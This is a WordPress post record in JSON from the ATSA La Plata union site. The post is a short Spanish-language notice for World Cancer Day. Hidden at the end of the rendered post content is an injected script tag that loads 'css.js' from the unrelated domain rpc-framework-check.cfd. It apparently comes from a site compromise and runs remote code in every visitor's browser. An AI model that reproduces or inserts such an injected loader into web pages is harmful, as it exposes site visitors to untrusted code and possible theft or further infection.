{"id":18205,"date":"2025-02-04T00:00:00","date_gmt":"2025-02-04T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18205"},"modified":"2026-02-02T17:22:57","modified_gmt":"2026-02-02T20:22:57","slug":"dia-mundial-contra-el-cancer-3","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/02\/dia-mundial-contra-el-cancer-3\/","title":{"rendered":"D\u00eda Mundial contra el C\u00e1ncer"},"content":{"rendered":"\n<p>\ud83d\udce3Cada 4 de febrero, se conmemora el D\u00eda Mundial del C\u00e1ncer, una fecha establecida por la Organizaci\u00f3n Mundial de la Salud (OMS) para concienciar sobre la importancia de la prevenci\u00f3n, el diagn\u00f3stico temprano y el tratamiento oportuno de esta enfermedad.<\/p>\n\n\n\n<p>Esta fecha se estableci\u00f3 en el a\u00f1o 2000, durante el Congreso Mundial contra el C\u00e1ncer en Par\u00eds. Desde entonces, se ha convertido en una oportunidad para que organizaciones, gobiernos y personas de todo el mundo se unan para combatirla. \ud83e\udec2<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos #D\u00edaMundialDelC\u00e1ncer2025<\/p>\n\n\n\n<p><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udce3Cada 4 de febrero, se conmemora el D\u00eda Mundial del C\u00e1ncer, una fecha establecida por&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18206,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,81,97,85],"tags":[],"class_list":["post-18205","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-salud","category-sec-de-cultura","category-sec-de-prensa"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18205"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18205\/revisions"}],"predecessor-version":[{"id":20864,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18205\/revisions\/20864"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18206"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18205"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}